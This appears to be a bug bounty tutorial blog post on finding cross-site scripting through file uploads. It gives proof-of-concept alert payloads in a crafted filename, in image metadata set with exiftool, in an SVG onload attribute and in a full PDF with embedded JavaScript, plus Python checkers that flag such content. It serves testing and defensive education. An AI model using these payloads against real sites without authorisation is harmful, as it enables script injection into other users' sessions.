    File Upload XSS | Find XSS in a different way while doing Bug bounty and Pentesting

    By TheToySec | January 13, 2023 | Updated: March 10, 2023

    Hey guys, this is TheToySec, back again with another post. In this post we will discuss file upload XSS and how to find XSS just by uploading a file during bug bounty hunting and penetration testing. So, without further delay, let’s start.

     

    Before talking about file upload XSS, let’s understand what XSS is.

    XSS stands for cross-site scripting, a client-side injection vulnerability that allows an attacker to inject and execute malicious code in a website from the client side. For more information you can refer to What is XSS and XSS Cheat Sheet.

     

    File Upload XSS

    File upload is a good place to look for cross-site scripting in a web application.

    Most web applications allow their users to upload files for many different purposes, such as updating a profile picture or attaching pictures, PDFs and other files to a comment, and these features are a handy place to look for loopholes. So let’s see how to test the entry points that accept uploaded files for XSS.

    There are different techniques for checking for file upload XSS vulnerabilities.

    Find XSS using File Name

    Well, the filename is reflected on the web page when you upload a file, so you can change the filename to an XSS payload and try to upload it to the web application. XSS may be triggered there. For example, the filename can be "><img src=x onerror=prompt("XSS")>.jpg

    If you get an error while creating the file on Windows, try Kali Linux instead, where hopefully there will be no error.

    Find XSS using Meta Data

    So you might be wondering: what is metadata?

    Metadata is simply information about the other data stored in the same file. You can also call it data about data.

    Now let’s create metadata carrying an XSS payload using ExifTool in Kali Linux.

    First, let’s inspect a file:

    exiftool hello.jpg

    Type the following command to embed an XSS payload using ExifTool:

    exiftool -Artist='"><script>alert(1)</script>' hello.jpg

     

    Let’s confirm whether the payload is embedded in the metadata by running the following command again:

    exiftool hello.jpg

    In the output we can confirm that the payload was embedded successfully. In my case I created a random image file named hello.jpg; you can use any name and embed any payload.

     

    Find XSS by uploading SVG file

    If the web application allows uploading files with the SVG extension, which is also an image type, then we can simply try to embed the XSS payload in an SVG file.

    Here’s how we can make an SVG file and embed the payload for XSS.

    Copy and paste the following code:

    <?xml version="1.0" standalone="no"?>
    <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
    <svg onload="alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>

    Now save it with the SVG file extension, e.g. XSS.svg, and upload it to a web application where SVG files are allowed. If SVG files are not properly sanitized, then hopefully you’ll get an XSS!
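
What "proper sanitization" has to catch in an uploaded SVG can be expressed as a server-side check that parses the file and reports script-capable content. This is an added example, not code from the original post; the function names, the list of flagged elements and the sample documents are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

# Elements that can run script or embed foreign (HTML) content.
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object"}

def local(name: str) -> str:
    """Drop the '{namespace}' prefix ElementTree puts on tag/attribute names."""
    return name.rsplit("}", 1)[-1]

def svg_active_content(svg_bytes: bytes) -> list[str]:
    """Reasons to reject an uploaded SVG; an empty list means none were found."""
    if b"<!ENTITY" in svg_bytes:
        return ["entity declaration in DOCTYPE"]  # refuse before parsing
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    for el in root.iter():
        tag = local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            name = local(attr).lower()   # xlink:href and href both become "href"
            if name.startswith("on"):
                findings.append(f"event handler {name} on <{tag}>")
            elif name == "href":
                # Browsers ignore whitespace inside the scheme, so remove it first.
                if "".join(value.split()).lower().startswith("javascript:"):
                    findings.append(f"javascript: URL in {name} on <{tag}>")
    return findings

# Constructed samples: one modelled on the SVG in this post, one harmless.
SAMPLE_SVG = (
    b'<?xml version="1.0" standalone="no"?>'
    b'<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" '
    b'"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">'
    b'<svg onload="alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>'
)
CLEAN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg">'
             b'<circle cx="5" cy="5" r="4"/></svg>')

if __name__ == "__main__":
    print(svg_active_content(SAMPLE_SVG))
    print(svg_active_content(CLEAN_SVG))
```

A check like this is a reject filter, not a sanitizer; serving user uploads from a separate origin with `Content-Disposition: attachment` keeps anything it misses from running in the application's origin.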

     

    Find XSS by uploading PDF

    If there is a feature for uploading PDF files, then we can simply try to embed the XSS payload in a PDF file.

    Here’s how we can make a PDF file and embed the payload for XSS.

    Copy and paste the following code:

    %PDF-1.3
    % 
    1 0 obj
    <</Pages 2 0 R /Type /Catalog>>
    endobj
    2 0 obj
    <</Count 1 /Kids [3 0 R] /Type /Pages>>
    endobj
    3 0 obj
    <</AA
    <</O
    <</JS
    (
    try {
    app.alert\("Hacked by none"\)
    } catch \(e\) {
    app.alert\(e.message\);
    }
    ) 
    /S /JavaScript>>>>
    /Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R
    /Resources
    <</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>>
    /Type /Page>>
    endobj
    4 0 obj
    <</Length 21>>
    stream
    
    BT
    /F1 24 Tf
    ET
    
    endstream
    endobj
    xref
    0 5
    0000000000 65535 f
    0000000015 00000 n
    0000000062 00000 n
    0000000117 00000 n
    0000000424 00000 n
    trailer
    
    <</Root 1 0 R /Size 5>>
    startxref
    493
    %%EOF
    
    

    Now save it with the PDF file extension, e.g. poc-1.pdf, and upload it to a web application where PDF files are allowed. If PDF files are not properly sanitized, then hopefully you’ll get an XSS!
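
The PDF above carries its script through the /AA, /JS and /JavaScript names, so an upload filter can triage PDFs by counting those names before accepting a file. This is an added example, not code from the original post; the function names, the set of flagged names and the sample bytes are assumptions made for illustration.

```python
import re

# Name objects that carry script or trigger an action automatically.
RISKY_NAMES = {"JS", "JavaScript", "AA", "OpenAction", "Launch"}

# A PDF name is "/" followed by any characters except whitespace and delimiters.
NAME_TOKEN = re.compile(rb"/([^\x00\t\n\x0c\r ()<>\[\]{}/%]+)")
HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")

def decode_name(raw: bytes) -> str:
    """Resolve #xx escapes, which the PDF format allows inside any name."""
    resolved = HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), raw)
    return resolved.decode("latin-1")

def pdf_risky_names(pdf_bytes: bytes) -> dict[str, int]:
    """Count risky names in the raw bytes of a PDF.

    ObjStm is counted too: object streams are compressed, so objects
    stored inside them cannot be inspected by a raw byte scan.
    """
    counts: dict[str, int] = {}
    for match in NAME_TOKEN.finditer(pdf_bytes):
        name = decode_name(match.group(1))
        if name in RISKY_NAMES or name == "ObjStm":
            counts[name] = counts.get(name, 0) + 1
    return counts

# Constructed samples: a fragment modelled on object 3 of the PDF in this
# post, and a catalog object with nothing risky in it.
SAMPLE_PDF = (
    b"%PDF-1.3\n"
    b"3 0 obj\n"
    b"<</AA <</O <</JS (app.alert\\(1\\)) /S /JavaScript>>>>\n"
    b"/Type /Page>>\n"
    b"endobj\n"
    b"%%EOF\n"
)
CLEAN_PDF = (b"%PDF-1.3\n1 0 obj\n<</Pages 2 0 R /Type /Catalog>>\n"
             b"endobj\n%%EOF\n")

if __name__ == "__main__":
    print(pdf_risky_names(SAMPLE_PDF))
    print(pdf_risky_names(CLEAN_PDF))
```

A non-empty result is a reason to reject or quarantine the upload, and a hit on ObjStm means the file needs a real PDF parser before it can be called clean.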

     

    Disclaimer: Hackerinthehouse, its author and its affiliates won’t be responsible for any actions made by you. If you do anything illegal with the help of this article then you might be caught, and at that time do not use the name ToySec, ha ha ha 😂😂, just kidding. This article is published for security research and education purposes only. It is the end user’s responsibility to obey all applicable local, state and federal laws.

     

    If you really like this post then give your reaction and don’t forget to share it with others. Till then, we will meet again with another interesting topic.

    Follow me here: https://www.linkedin.com/in/soumyaranjanpradhan/

    Thank you for reading this article and have a nice stay there! 
